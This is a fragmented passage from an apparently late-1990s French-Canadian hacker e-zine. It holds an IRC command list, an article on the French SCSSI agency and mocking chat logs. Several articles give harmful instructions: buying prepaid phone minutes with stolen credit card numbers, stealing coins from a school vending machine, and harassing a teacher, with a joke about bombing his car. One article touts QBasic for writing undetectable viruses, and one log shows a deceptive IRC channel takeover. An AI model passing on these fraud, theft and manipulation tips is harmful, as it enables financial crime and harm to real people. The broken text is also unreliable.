met à en balancer un, ça va encombrer un ri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utilisez pas de bot s'il ne doit servir qu'à "garder" votre canal ou votre nickname contre d'éventuels usurpateurs (à moins que votrecanal n'ait une renommé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ondiale et votre nick une importance significative). Personne ne cherchera à s'emparer d'un canal qui ne réunit que deux personnes." (Macpl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Tout comme sur telnet, IRC réagit avec des systèmes de commandes à entrer pour éxécuter des fonctions spécifiqu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Eléments de syntax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signifie que l'argument en facultatif.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est employé à la place de n'importe quel chiffre/nomb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essage désigne un texte, quel qu'il soi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hannel fait référence à un canal dont le nom commence par # ou &amp; (ie: général ou loc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ick indique le nickname, ou surnom, tel qu'utilisé communément sur IRC. Bon gars ce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est parti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dmin server renvoie le nom de l'administrateur du serveur désign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way message vous place "away", c'est-à-dire temporairement absent d'IRC (si vous ne donnez pas de message, vous ne serez pas placé "away"). NB: mê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way", vous pouvez continuer à parler normalement... ceci est juste une indication donnée aux autres utilisateurs comme quoi vous êtes occupés à autre cho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an nick effectue un "ban" du nick désigné pour le channel sur lequel vous êt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ye message pour quitter IRC en affichant un message de dépar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roadcast message pour envoyer un message sur tous les canaux sur lesquels vous êtes à la fo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hannel channel [passwd] pour rejoindre un canal (avec mot de pas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mdchar c change le préfixe de commande IRC (par défaut /) pour le caractère désign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ping nick affiche le temps de réponse de Nick en second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tcp target command envoie une commande CTCP (Client to Client Protocol) à votre cible(=target). On va dire Nick, pour faire simple. Faites /ctcp target clientinf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ur de plus amples informa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ound sndname joue le son "sndname" sur l'ordinateur de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ound affiche la liste de son disponibles sur l'ordinateur de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dcc list affiche la liste des fichiers disponibles sur l'ordinateur de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dcc version affiche la version xdcc (actuellement 1.0)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dcc send # demande à Nick d'envoyer le fichier numéro # à votre ordinat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ction = /m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inger affiche le temps de latence et/ou l'adresse email de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ersion affiche la version du logiciel clie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lientinfo affiche toutes les commandes ctcp d'un logiciel clie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serinfo affiche le champ "userinfo" d'un utilisat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ing permet de vérifier si un utilisateur est toujours prése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ime affiche l'heure locale d'un utilisat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ate affiche la date et l'heu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cc command nick envoie une commande dcc à Nick (voir plus loi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bug montre toutes les commandes "bas-niveau" (low level) de votre logiciel client. A vos risques et périls, plein de trucs étranges peuvent arriver. Je vous consei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juste de test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xit message = /by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gnore pattern vous permet d'ignorer les messages de "nick!user@host" (wildcards reconnu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ttern efface le pattern de la liste "igno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nfo donne des informations sur le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nvite nick channel invite Nick sur le canal désign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son nick montre si Nick est sur IRC ou non. Ne fonctionne pas sur tous les serveu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join pour rejoindre le dernier canal sur lequel on vous a invit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join channel [passwd] = /channe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kick channel nick :msg pour "kicker"(=foutre dehors) Nick du canal avec un petit message (sympathique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ave channel pour quitter un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inks affiche les connections du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inks mask montre tous les serveurs contenus dans le mas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ist donne une liste de tous les canaux. Attention: vu le nombre de plus en plus importants de canaux sur IRC, vous risquez d'être déconnecté du serveur telle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ela fait de données. Pas de wildcards pour le mome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in # affiche seulement les canaux avec un minimum de # utilisateu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ax # affiche seulement les canaux avec un maximum de # utilisateu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ublic affiche seulement les canaux publiqu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rivate affiche seulement les canaux privés (mode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ocal affiche seulement les canaux locaux (ceux avec &am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global affiche seulement les canaux glob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opic affiche seulement les canaux avec topic établ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ask- affiche seulement les canaux reconnus par le mask. Par ex: /list -*ma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users affiche des statistiques: le nombre d'utilisateurs IRC dans le monde et le nombre de can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ap affiche un plan de toutes les connections du serveur (seulement sur Under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assop donne le statut d'opérateur à toutes les users du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assdeop enleve le statut d'opérateur à toutes les users du canal sauf vo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assunban efface tous les bans d'un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e action envoie la description d'une action au canal.Peut aussi être utilisé en DCC chat (private ac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ode channel parm établit les modes d'un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 canal priv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 canal secr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 canal "invite-only". Seuls les users invités peuvent y accéd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 canal modéré. Seuls les utilisateurs "+v" et les opérateurs peuvent parl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 bloque les messages provenant d'ailleurs que le canal (pas de message du serveur, don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 seul les opérateurs peuvent changer le topi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 # limite le nombre d'utilisateurs d'un canal à # personn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 nick permet à Nick de parler sur un canal modér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 liste des bans. Ne fonctionne pas sur certains serveu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 nick!username@hostname pour bannir Nick du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k key établit le mot de passe du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 nick donne le statut d'opérateur à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 enleve le mode x, pour peu que x soit un des modes décrits ci-dess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ode nick parm établit les modes utilisateu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 utilisateur invisible (ie: vous ne le verrez pas si vous n'êtes pas sur le même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 permet de recevoir les notices du serveur (messages concernant l'activité du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w permet de recevoir les wallops, messages envoyés à tous les ops d'un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 donne le satut d'IRCop... seulement si vous êtes IRCop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 mode "deaf"(=sourd). Seulement pour les bo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otd [server] affiche le message du jour [d'un autre serveur IR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sg nick message envoie un message privé à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ames channel affiche la liste des utilisateurs d'un canal. Note: si vous n'êtes pas sur le canal, vous ne verrez pas les utilisateurs qui sont "+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ick newnick pour changer votre nicknam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ot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otice user|channel msg (presque comme) /msg, avec cependant la possibilté d'envoyer un message privé à tout le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otify affiche la liste "notify".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otify nick ajoute Nick à la liste des notifications (notify). Montre chaque signon/off de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ick enleve Nick de la "notify".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msg text envoie un message à tous les ops d'un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notice text envoie une note à tous les ops d'un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p nick donne le statut d'op à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op nick enlève le statut d'op à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rt channel = /lea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ing ping un utilisateur. Utilisez /ctcp ping pour mesurer le délai de répon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ote raw irccommand envoie une commande à un serveur IRC, exactement telle que tapé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ery nick ouvre une fenêtre de message privés avec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it message = /by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rver hostname [port] vous permet de basculer sur un autre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lence affiche la liste des utilisateurs placés en "igno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lence mask permet d'ignorer les utilisateurs concernés par le mas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gnoff message = /by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ound nick soundname voir ctcp soun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tats affiche des statistiqu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b affiche la liste des bans du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 retourne une liste des serveurs auxquels le serveur peut se connecter ou dont il peut recevoir/autoriser les connec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 retourne une liste des serveurs forcés d'agir en "leaves"(=feuilles, les connections étant basées sur le principe d'arborescence) ou autorisés à agir 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ubs"(=pivot/raci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 renvoie une liste des hôtes auxquels le serveur autorise les clients à se connect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k renvoie une liste des combinaisons username et hostname des bans du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 renvoie la liste des connections du serveur, montrant depuis combien de temps ces connections sont établies, le trafic sur cette connection en bytes et les messag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ur chaque direc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 renvoie une liste des commandes supportées par le serveur et le compte d'utilisation pour chaque s'il est différent de zéro.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 renvoie une liste des hôtes dont les clients peuvent devenir (irc)op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 renvoie une ligne montrant depuis combien de temps le serveur est établ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y montre les lignes (Class) Y du fichier configuration du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mmon user@host invite user@host sur IRC (l'hôte/host doit être un serveur). Obsole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ime = /da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opic channel text établit le topic d'un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race [user] affiche les serveurs utilisés pour se connecter à l'utilisat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ype envoie un fichier texte dans le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nban pour enlever les ba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nban nickmask efface le mask de Nick (nick!username@hostname) de la liste des bans du can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sers (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ersion affiche la version du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who channel donne la liste des users du canal désign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whois donne des informations sur le dernier Nick à avoir rejoint le canal ou envoyé un message priv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whois nick donne des informations sur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whowas nick donne des informations sur Nick, celui-ci n'étant plus en lig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dcc nick affiche les commandes utilisateurs XDC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dcc nick LIST affiche la liste des fichiers téléchargeables de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dcc nick SEND # télécharge les fichiers # de Ni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dcc nick VERSION affiche la version XDC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mandes des IRC Operato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nnect target port oblige le serveur distant à essayer d'établir une nouvelle connection avec le serveur cible(=target), sur le port spécifi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ie pour forcé le serveur à se déconnecter et cesser toute activit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ash reconfigure un serv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os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kill nick comment le KILL est utilisé pour faire en sorte que la connection du client-serveur soit fermée par le serveur qui a la connection. KILL est utilisé par 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rveurs quand ils rencontrent une double entrée dans la liste des Nicks valides et clôt les deux entrées. Commande également accessible aux ircop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per nick password donne les privilèges du statut d'IRCop à un utilisat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ehash utilisé pour forcer un serveur à relire son fichier de configur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estart pour redémarrer un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quit server comment ferme une connection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uping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wallops message message à tous les op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mandes DC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hat - réclame l'ouverture d'une connection DCC ou autorise une telle requê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nd - envoie un fichi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send - envoie un fichier tex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get - reçoit un fichier (en réponse à un SEN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get - reçoit un fichier tex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ist - donne une liste de toutes les connections DC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xdc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ist - donne une liste des fichie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elp - affiche l'aid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send - demande un fichier." (Macplus)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Le SCSSI, par Clad Strif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CSSI (Service Central de la Securite des Systemes d'Informations): ce nom ne vous dit surement rien, ou très peu de choses. En 1986, est créé auprès d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emier ministre un Service Central de la Sécurité des Systèmes d'Information (placé sous l'autorité du délégué interministériel pour la sécurité des systèm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inform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ntrairement à la DST qui surveille les pirates informatiques, et les pirates informatiques qui surveillent la DST, le SCSSI surveille sans être vu. Prenons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xemple rée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Un clan de hacker a pour chef NeurAlien. Ce clan n'est pas connu mais on ne le citera pas. Pis un beau jour on apprend que NeurAlien bosse à la DST... Puis a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CSSI, où il a pour rôle de surveiller tout ce qui se passe. Etant dans un clan de hackers (programmeurs plutot), il va demander à ceux-ci de fouiner un peu partout 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recherche de quelques informations qui ne regarde que lui. Inaperçus, espionnage... Brref, on s'en fout mais s'était pour illustrer ce qui pouvait se passer avec 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genre d'organisme, et dont on ne se méfie pas du to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Voilà ce que le SCSSI dit qu'il fai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 SCSSI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valu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procédés de protection cryptologiqu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produits et systèmes relevant des technologies de l'inform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procédés de protection contre les signaux parasites compromettan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grée les équipements, produits et systèmes utilisés pour le traitement des informations classifiées de défen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rocède à l'agrément des centres d'évaluation de la sécurité des technologies de l'information dans le cadre du schéma d'évaluation et de certific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ertifie les produits évalués par les centres d'évaluation agréé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nstruit les demandes d'autorisation de fourniture et d'utilisation de moyens et de prestations de cryptologi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tatue sur les exportations des technologies, des produits et des systèm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labore et distribue les clés de chiffrement au profit de l'administration et du secteur priv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ssure la formation des spécialistes dont l'Etat a besoin ainsi que la sensibilisation des respnsables de l'administration et du secteur privé dans le cadre du Cen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tudes Supérieures de la Sécurité des Systèmes d'Information (C.E.S.S.S.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nseille les administrations et certaines entreprises pour la sécurisation de leurs systèmes d'inform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rticipe aux actions de normalisation nationales et internationales en matière de sécurité des systèmes d'information et suit les travaux relatifs à la réglement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ssure les relations techniques avec ses homologues étrange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ction au profit du secteur privé est soumis à cetaines conditions visant à ne pas causer de tort aux sociétés dont la raison sociale touche à la sécurité des systèm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inform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écrets relatifs au SCSS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Journal Officiel de la République Françai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u 8 mars 1986 page 3592.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écret No 86-318 du 3 mars 1986.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rtant création du service central de la sécurité des systèmes d'inform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 Président de la Républiqu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r le rapport du Premier minist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u le décret No 86-316 du 3 mars 1986 portant création du directoire de la sécurité des systèmes d'inform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u le décret No 86-317 du 3 mars 1986 portant création d'une délégation interministérielle pour la sécurité des systèmes d'inform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u le décret No 81-514 du 12 mai 1981 relatif à l'organisation de la protection des secrets et des informations concernant la défense nationale et la sûreté de l'Eta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écrè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rticle 1er. - Il est créé auprès du Premier ministre un service central de la sécurité des systèmes d'information placé sous l'autorité du délégué interministériel pour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écurité des systèmes d'inform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rticle 2. - Le service central de la sécurité des systèmes d'information est chargé d'apprécier le niveau de protection des systèmes d'information. Il participe a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ctivités de recherche relatives aux procédés de protection, coordonne, en liaison avec les maîtres d'oeuvre, les études et développements de protection d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ystèmes d'information gouvernementaux et approuve leur destin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rticle 3. - Le service central de la sécurité des systèmes d'information est responsable de l'évaluation des procédés de protection cryptologiques. Dans ce domai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l examine les besoins que lui soumettent les départements ministériels et propose les solu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l analyse les procédés crypotologiques élaborés par les concepteurs en vue de formuler un jugement sur l'utilisation qui peut en être fai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l se prononce sur la validité des protections cryptologiques en servic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service central de la sécurité des systèmes d'information se tient informé des travaux théoriques effectués en matière de cryptologie et entretient les contac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ppropriés avec les organismes de recherche concernés par le suj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rticle 4. - Le service central de la sécurité des systèmes d'information participe à l'évaluation des procédés de protection non cryptologiques. Il examine les besoi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latifs à ces procédés qui lui sont soumis par les départements ministériels et les traite avec le concours des services ou centres techniques gouvernementa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mpétents. Il centralise et diffuse les résultats et se prononce sur les niveaux de protection assuré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rticle 5. - Le service central de la sécurité des systèmes d'information suit les travaux relatifs aux normes, aux spécifications des équipements et à la réglementa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n liaison avec les responsables de ces travaux et avec les utilisateu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rticle 6. - Pour l'exercice des missions ci-dessus définies, le service central de la sécurité des systèmes d'information: - fait appel aux compétences et aux moye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s organismes gouvernementaux concernés dans le cadre de protocoles rédigés à cet effet; - entretient les relations adéquates avec les industriels agréés par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Gouvernement; il est, à ce titre, associé à la rédaction des protocoles d'accord passés entre le département de la défense et ces industriel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rticle 7. - Le service central de la sécurité des systèmes d'information est chargé en out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suivre l'instruction des dossiers relatifs à la sécurité des systèmes d'information destinés à des utilisateurs non gouvernementaux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instruire, en liaison avec les instances concernées ou à leur profit, les dossiers relatifs à la sécurité des systèmes d'information destinés à des utilisateurs étranger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ntretenir les relations techniques souhaitables avec les services homologues étranger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organiser, au profit des États ayant passé avec la France des accords en matière de sécurité des systèmes d'information, l'assistance technique et la formation d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ersonnels prévues dans ces accord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pporter son concours aux organismes gouvernementaux qui font appel à lui soit pour la fabrication de clés de chiffrement, soit pour la formation de personnel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pécialist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rticle 8. - Le service central de la sécurité des systèmes d'information assure la direction et le fonctionnement du centre d'études supérieures de la sécurité d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ystèmes d'inform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rticle 9. - La composition du service central de la sécurité des systèmes d'information, les qualifications de ses personnels et les corps d'origine des agents détaché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u mis à disposition sont fixés par le Premier minist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rticle 10. - Le service central de la sécurité des systèmes d'information est rattaché du point de vue administratif et budgétaire au secrétariat général d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Gouvernement (services généraux du Premier minist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rticle 11. - Le Premier ministre, le ministre de l'économie, des finances et du budget, le ministre des relations extérieures, le ministre de la défense, le ministre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intérieur et de la décentralisation, le ministre du redéploiement industriel et du commerce extérieur, le ministre des P.T.T. et le ministre de la recherche et de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echnologie sont chargés, chacun en ce qui le concerne, de l'exécution du présent décret, qui sera publié au Journal officiel de la République françai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Fait à Paris, le 3 mars 1986.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Selon un organisme de sécurité informatique, le SCSSI aurait plutot comme miss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apprécier le niveau de protection des systèmes d'information et notamment les procédés cryptologiqu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la recherch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la collaboration avec les organismes gouvernement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instruire les dossiers relatifs à la sécurisation des systèmes d'information destinés à des utilisateurs non gouvernement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la réception et instruction* des déclarations et des demandes d'autoris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contrôle et enquê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agrément des Tiers Partie de Confiance (TP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NB: il est clairement marqué ici enquête, alors que ça n'est pas explicité comme il le faudrait par le SCSSI. J'en reviens à mon exemple du déb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Conslusion: méfiez vous des contrefaç... euh qu'est-ce que je raconte moi: du SCSSI pardon.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Discussion avec un lamer, par Clad Strif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tte discussion a été réalisé sur ICQ, je me suis bien payé la tête du type, et j'étais mort de rire tellement il en rajoutait, il en rajoutait... En fait cette discussion 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lutôt un coup de gueules contres les débiles du net, mais c'est plus drôle de mettre un log, que de pousser un coup de gueule dont on s'en fout, de toutes manièr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sal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on m'a parlé de tes talents de hacke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ben je sais hacker par netbus, socket23, je sais utiliser différents OS (win 95, 98, 3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et alors parle moi des tie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je sais flooder, mailbomber, nuk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hey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cool ç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faudrait qu'on s'échange des programm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ça trombe bien moi aussi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j'ai pelin de troja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mais moi j'ai arreter avec ses merde de prog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ah? tu fais k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COO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les vir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il ya plus violent mainten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PI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KOI DON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pi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alles s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d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ahhhhhhhhh ahhhhhhh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NAN JURE j'DIRAIS RI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STP DIS M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non non je fais me faire prendre par les keufs sin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s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je ferais tout ce que tu voudra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non n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je serais presque comme ton escla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je... je ferais tout ce que tu veux que je fas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TO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mais dis moi oyu c que t'apprends tout ç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c'est pas la pei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ahh c'est le talent c'est to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un mec qui se foutait de ma gueu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mais il a dit que je pouvais venir te voi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un ALT F12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mais s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apprends m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je te hackerais pas! promis jur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craché: PTOU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c'est qui qui t'a parlé de moi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n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sérieux? MAIS COMMENTR T'AS FAI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nan c moi qui lme ferait prendre! pas t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je me suis fait deja prendre parce que j'ai pirater les compte bancaire alors stop mainten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il suffit de chercher le code d'entrer et de s'introduire dans les fichie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putai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et ils t'ont dit koi à la polic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j'ai fait virer 2 000 000 frs sur mon com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putaaaai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j'ai rendu l'argent et j'ai fais 6 mois de to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mais comment t'as fait pour trouver le pas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t'as fait ça par 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oui mais j'aimerais mieux m'y conbait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il suffit de s'y connaitre afon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ftp c'est plus a la mod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coo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t'as pas des programm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il faut s'y connaitre dans la programm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tu peux pas m'les envoyer? juste 1 ou 2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non je fais mes propre programm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tu plane ou qu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S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mais oui mais là c moi pas t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piti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je serais ton esclave si tu ve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pis hackmoi pas s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je te fais confianc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la prison ça me suffi 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non je file pas mes prog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ouais j'en ai un pas m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ouhai ben si tu  as un bon mailbomber  tu me le fais parveni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Kabo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tu conna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c'est leque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sur system7.or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t'as plein de çà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alle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je te file plein d'infos de pleins de prog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non pas celui là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et tu m'apprends 2 3 truc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hackers.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ok pour le march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Clad Strife  &gt; pis personne en saura ri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WzGate&gt; tu connais d'autre site comme ça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s il est parti... Bon ben voilà un typique lamer. Il n'a pas un nickname à la con (pas trop), mais qu'est-ce qu'il est bête! Si vous avez des logs encore pires qu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ceux-ci (j'en ai faut pas croire, mais ce gars c'est un phénomène!), vous n'avez qu'à nous les envoyer.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mment reconnaitre un lamer, par Dukest4r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emierement quelqu'un qui se vante du fait d'etre soir hack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hreaker, carder, etc etc est en general un tit nul dej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informatique qui commence dans ce monde et qui se croit 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out simplement, mais c normal. A peu pret tout hack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ssent par la un jour ou l'autre, mais je vous le d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vrai hacker ne vient pas se vanter de ses talents et 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emps normal, il reste modeste le plus possible! Malgr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aujourd'hui sont rare les vrais hacker. Tlm se dit hack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 utilise des programmes pour detruire et non constru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st ce qui donne une mauvaise image du hacker dans no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ociété... car ne l'oublions pas le hacker est sensé etre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our aider l'informatique et non detruire. Donc c'est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utre moyen de reconnaitre un lam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heckez des phrase que si vous voyez qqpart c pcq c vraime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raiment des lamers, des phrase prononcé par certaine bo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on nommera pas... riez tous en co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c ca c un script IR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accepte le fichier donotexecute.exe pis execute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pis apres ca attends que ton ordi buz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apres tu va etre devenu un hack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ticker&gt; ouvre un gate :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comment j ef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sti c koi le buz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la grc est a 2 pas de che nous st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MrX-&gt; fait qqc a sa stepla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MrX-&gt; 142.217.232.227</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MrX-&gt; on dirait qui flood m port en me nuk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_woody_&gt; c koi l'adresse du cha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www.penis.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c koi tu as comme prog pour faire la pa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ticker&gt; front page 98</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ticker&gt; webexpert 3</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ticker&gt; eu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moi j'ai plus rien a part l'éditeur de netscap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pis aussi, demander a pres_who de recruter a mt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genre on pourrait former quelques newbi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ca serait ho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ticker&gt; ou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genre on pourrait former quelques newbies  &lt;== commencez par vous formez vous me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ca serait ho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ticker&gt; ou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genre une divison a q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pis une autre a mt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pis après qui sa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wzGATE&gt; on se part un réseaju d'espionnage :o) &lt;=== criss ta quelle age?!? 12?</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vous voyvez sur une pa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otre célèbre BBS. Et bien, celle-ci n'est pas encore terminé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ites vous bien que la personne se cré en asti pi qu'sa c'tun lam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 bien c'est tout j'espere que dans cette article vous aurez compr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message ô combien subti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Dukest4r</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mment avoir un cellulaire avec des minutes à l'infini?, par Fr0d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C'est simple il suffit d'avoir un numéro de carte de crédit et pis un cellulaire activé. Lorsque vous acheter un cellulaire (remarquez que vous pouvez le carder avec une cc mais ca exige beaucoup de compétence...) et que vous avez l'idée de payer à la carte, vous êtes a deux pas d'avoir un cellulaire pour une couple d'années!  Il suffit de checker sur la petite carte qui donne la mettons yé marquer 25$ su la carte parce que vous avez acheter pour 25$ de minutes, bin la à l'endos habituellement ya un petit numéro de téléphone où si vous appelez, vous pouvez payer avec VISA ou MASTERCARD. Vous appeler avec votre cellulaire à ce numéro et vous commencer a peser su le 1 quand il le demande pis su le 2 quand il le demande pour enfin vous rendre au moment ou vous rentrer le numéro de carte de crédit et le montant que vous voulez mettre en minutes. Vous rentrez par exemple 1000$ pour avoir environ 8000 minutes si c'est pas plus et vous voilà booster. Vous avez aucune chance de vous faire pogner....disons que vous avez 0.00000001% de vous faire pogner parce que c'est vraiment dure de retracer un cellulaire...mais ca vaut la peine d'essayer hehe. Si vous voulez être plus subtile pis pas avoir de trouble avec la GRC ou autre, biller pas plus que 100$ par carte de crédit.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Fr0d</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mment se faire du petit change sans même travailler? par Fr0d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Je ne sais pas si ca marche partout mais à mon école, les machines à palette de chocolat son vieille en tabarnak. Eh! C'est simple, il vous suffit de vérifier si il y a une caméra qui vérifie les lieux (sinon ben bonne chance avec la direction heh! Puis si il y a aucune caméra en vue, vous mettez dans le conduit où le change tombe, quelque chose d'assez gros pour que le change tombe dessus sans faire de bruit...(le best c'est la gomme à coller) pis après ca si vous remarquer, quand vous débranchez la machine distributive, vous pouvez voir que le change tombe dans la petite affaire à change à chaqu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fois. Donc si vous bloquez le conduit, le monde vont penser que la machine à bouffer leur argent et vont juste gueuler après! Ils vont partir après avoir "kicker" la machine une bonne dizaine de fois et, vous, après quelques instants, vous allez prendre le petit change et voilà le tour est joué!</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Fr0d</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mment faire chier un Prof que vous haïssez? par Fr0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oi je c'est comment faire chier un professeur sans lui toucher et sans lui faire mal, juste en lui faisant montrer que c'est un épais pis ya pas d'autorité sur vous. Je vais vous donnez un exemple. L'autre jour j'avais envoyer chier le gars qui s'occupait des gymnases (parce que y voulait que je mette le petit suit de mon école) pis j'ai eu en conséquence, une semaine sans rentrée dans le gymnase. Mais moi, sans rien dire j'ai sacré mon camp (il pensait qui venait prouver qu'il avait de l'autorité). Le lendemain je suis rentré dans le gymnase pis la ya commencer à me dire: (1-&gt; lui 2-&gt; m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SORT ta pas d'affaire icit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C ca que je fait (pis je bougeais p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SO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C ca que je fa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SO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C ca que je fa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is après une couple de fois que tu fais ca en lui regardant din yeux ben comme il le faut, tu y fait un moon pis tu sacre ton camp. (tu fait ca devant tout le monde comme ca le monde vont rire de lui parce que y vient de se faire insulter par un gars plus jeu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le gars ya envie de te frapper mais ya pas le droit mouhahahha fak y peut pas rien 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ai faite ca pendant une semaine pis la maintenant le gars ya honte parce que j'y ai prouver que yavait pas d'autorit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vous voulez être plus chien avec vos profs, jvous suggère d'aller checker din section d'anarchy pis lui foutre une bombe dans son char ou quelque chose dans le genre. LO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Fr0d</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mment se faire du $$$ avec une page web, par LORDSOTH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vent tout, vous devez savoir comment faire u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ge web, je ne peu pas vous expliquez , c'es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rop long . Ceux qui savent comment fair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devez vous trouver un abonnement d'espace qu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crisse pas dehors quand ils voyant du cu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faite le site comment à l'habitude (de cu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ien sûre ). Apprêt, vous tenter de trouver d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bannières qui paye!!! Je sais que c dur, ma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 existe …ben je pense…??? Apprêt tout cela,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incérez dans votre page web des images et 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ravers les images , vous incérez le lien de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age web de votre bannière! ( Méton que petas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001, c'est une images, petasse 002 aussi mais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rois, quand le tipe vas cliquer dessus, il v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aller sur votre bannière J pis la sa vous fai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u $$$. Mais la, vous aller me dirent ouin, com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faire venir le monde sur ma page web ??? Bi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remièrement, vous allez sur mirc et quand vo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êtes connecter  vous all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ans mirc editor, et ensuite tu clique s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opups et tu met on 1:join:#:/msg Ton messag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dans et ensuite, tu rente dans un Channel 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out ceux qui vont entrer dans le channel vo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voir un beau petit message de pub et la ils vo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ller voir pis la il vont ce faire pogné un coup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de foi J sit tu veux pus faire de pub, tu éfac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on mesage et le code de dans popup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LORDSOTH</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Qbasic par Ri£r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basic est l'équivalent de Quick Basic. La version la plus utiliser de QB est la 4.5 mais pour le plus rapide cherche QBX 7.1. Qb est un langage de programmation DOS les possibilité sont immense tout de même. À des fin commerciale autant qu'à des fin de hacking. Si vous avez entendu parler des Virus TCK ou encore même du virus Ripper (Ils ont tout 2 été fais en Qbasic) et Ripper et TCK sont 2 très DESTRUCTEUR virus que aucun anti-virus n'a encore été capable de détecter car Q Basic n'est pas soupçonner a faire des virus et en plus le compileur est inclus dans le fichier. Il est facilement trouvable sur le net aller sur : http://www.quickbasic.com dans la section File Vault il le donne. Maintenant pour ceux qui ne savent pas comment s'en servir. Et bien dite vous que c'est comme Visual Basic sauf que le CODE Basic de fais toute dans une seul forme et le graphique vous devez vous en occuper personnellement selon vos capacité c'est peut être plus long a faire un bon programme QB mais il est dans le cas des virus beaucoup plus discret, rapide, petit et efficace qu'en Visual Basic. Pour avoir des cours personne de Quick Basic suffit de me laisser un message sur mon e-mail personnel ou encore mieux de me le laisser sur mon icq : 21442703 E-Mail : Nicolas_hot@hotmai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elque commande de ba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LS (Clear l'écr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INT (Écrit une string a lécr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NPUT (Entre un champ dinsertion a lécr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F (Le vérifieur de condi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LSE (Le completeur de condition non remplit IF)</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O " UNTIL " Condition " "- LOOP ( Boucle de répition Until sert a définir la condition pour stopp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HILE " NOT " Condition " " WEND (Autre sorte de boucle pour des condition de type différ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LL (Pour appeler des commande venant d'une librairy loader en partant le QB voir plus lo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OR (Lettre)(&amp;) NEXT (Lettre)(&amp;) (Boucle quantitative le &amp; est demander si la quantité de répétition est supérieur à 65535)</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PEN (Path) FOR (Utilisation) AS (Numéro d'ouverture) (Ouvrir un fichier a des fin Utilisation défin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LOSE (#) (Fermer un fichier ouve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SET (Fermer toute les fichier ouve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YSTEM (Terminer le programme en resettant to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ND (Stopper le program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INT (#), (TEXT) (écrire dans un fichier ouve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CLARE SUB (SUB) (Variable) (Déclarer une sous fonction a fin d'utilisation répét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CLARE FONCTION (Déclarer une sous fonction a utilisation répét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IM (Déclarer une variable pour tout le module (SHARED) est souvent a utili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KILL (PATH + FILE) (Sert a deleter un fichier Temporaire ou Permanent… Souvent utiliser dans les vir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F SEG - POKE - GET - READ (Commande complexe a l'utilisation mais bien utile dans les FORCE BOOT de DO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e crois que pour une première rubrique je vous ai assé bourré le crâne avec quick basic, si sa vous as interesser et bien c simple pour plus d'information contacter moi… Pis si vous avez adoré larticle et bien dite le au chef des QHA… Si sa peux être un moyen de me faire augmenter qui sais ;P</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lang w:val="en-CA"/>
        </w:rPr>
        <w:t>Pour un article sur le QBasic plus avancé lis le prochain E-zine des QHA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Ri£r</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Introduction au Forgage, par LORDSOTH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lang w:val="en-CA"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Malheuseusement nous n'avons pas pu inclure cette article dans ce E-Zine car ce E-Zine est ecrit en pure text et l'autre a des images et des affaire du genre pas supporter par le pure text... donc nous l'avons inclus dans le Zip QHA10.zip... sous le nom de Forge.doc donc si tu veut apprendre a forger tu sait ou aller astheure :)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Technique pour faire des T/O (takeover) sur IRC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tte technique peut sembler stupide et lamer m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ti qu'sa marche quand meme cré mo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ller voir le master du channel pi offré lui plein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ruc vraiment hot style des FTP T3, des eggdrop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c, si c un newbie tu lui dit tu va avoir tes affai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and tu va revenir il va faire toute ce que t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eut... le flo va capoter pis y va te op .. si c un ch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warez tu dis que tu a plein de ftp pis tou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ller voir le log de Spiner voir comment il s'y est pr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 pour terminer il n'y a pas de technique vraiment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akeoverer des chan avec des X/W a part d'a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meme IP qu'une des personne enregistrer au X/W et s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ssword... Pour voir une exemple d'un t/o qu'on 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 faite pour vous faire un log et vous prouvez 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 marche (dailleur on la faite pamal plus qu'une f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lors bonne lectu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3:42:23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Yo Ma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a te tente tu davoir 1 eggdrop LinuX 24/24 7/7 , avoir ton owner dessus + avoir acces a un FTP Dual T3 avec 50 gig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p3</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dont 5 gig de Mp3 Hip Hop Undergrou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u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 10 de hip hop conn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faudrais tu demande ca a Neaso quand ils est ic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ar moi , je susi op sur plein de chanel de warez amis il fo que je soit ops ur un chan de hP H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de zik qu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ay y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ias toi man tu srais daccor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ah p-e faudrais regard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he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ide moi , jva instalelr Mon eggdrop pour que des que Neaso Rentre Qu'il aille son Voice , et un auto msg ui disais quil ets Master Dmon eggdrop , + quil a un FTP dual T3 de 50 GiG de Mp3</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i lattend dans le aprty line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la il va seter son passwor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ils e fera op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la Ba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 va etre Joy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is tout va march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No Such Nick/Channe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ckname/Channel is currently unuse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ah p-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ouais mais fodrais faire ca Now ma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u vois on a assez eu de trouble avec les eggdrop la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veux maid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ubli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oi j fais rien de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ha wouais pis tu evux tu que jvous les set comme du Mond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t en plus que tu porte le nick du gars qui s appelle JES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peux vous seter vos eggdrop comme du Mo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lo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le nick du gars qui sapelle jes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 qui lu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 quoi quil a fai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st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s tu du trouble ave cles putin de lopete de QH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ah y m fesais chier alo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s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Y peuve rien m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ontraire devraige d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ont fo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ouahaha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 dans marde mon gra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n cr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Vos eggdro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s on une Fai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fake eux .. surtout nico15</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s peux rentré dedans sans probleme et devenir owner du egg en 1 mi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lros si je serais toi , soit que je fermerais mon ordi NOW</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 que tu me fais ocnfiance pis jsauve ton chanel ave cmone gg que le tit pd de nico peut rien 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lors tu fais ca pour NiCo15???</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NiCo15 qui ta demander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lors raison de plus pour pas embarquer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N po full tu comrpend croc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écoute b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xplq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13:51] -ANONYM- si ej serais jme grouillerais a me répondre car nico15 y va pas breter longtmeps avant de oute pet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quoi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ICO JLE HAIE A MORT , NICO STUN PRO DES EGGDROP IL EST UN DES MEILLEUR QUE JE CONANIS , ET VOS EGGDROP ON UNE FAILLE , ALORS NICO PEUT LEXPLOITER ET DEVENIR OWNER EN 1 MINUTE DU EGGDROPE T AINSI FAIRE UN TAKE OV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de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e je dis quil peux toute peter votre chanel dans 10 seconde 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fake ga la moi a ta place , soit que tu me fais confiance pis jmet mone ggdrop linux 2 génération que nico y av sucer avant dans vnir a bo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 sinon tu te fait taker ton chanel apr ce ptit p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denfant gat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VOI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 *BaLdBoY* youho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yuho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YOUUUUUUHO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3:58:34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3:59:55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de koi voi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er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XCoRe:#warez-mechant- FTP 3:ftp://209.94.157.4/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:33 par n3ophra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REGARDE CA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va te metre ca SIMP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i tu me op pas MOI ou MON EGGDROP , NICO VA FAIRE UN TAKEOVER SUR TON CHA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comprend tu bien c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ttend la j ai laide d un IRCop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t en plus ils connais NiC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depuis qu il s appelle Nico14</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heke M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ico ya une liste dapeupres 10 metre de long de ga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y revien 1 sec apres avior été k lined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rios moi si tu tien a ton chanel .. op moi et jop mone ggdr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la t en sécurit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 le jure m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hu pas op aprtout a coze chu un l4m4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4:03:17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4:07:20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k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ut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No Such Nick/Channe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ckname/Channel is currently unuse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No Such Nick/Channe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ckname/Channel is currently unuse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k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s-ce que tu me fias confiance op sur warez4all op sur #quaza op sur 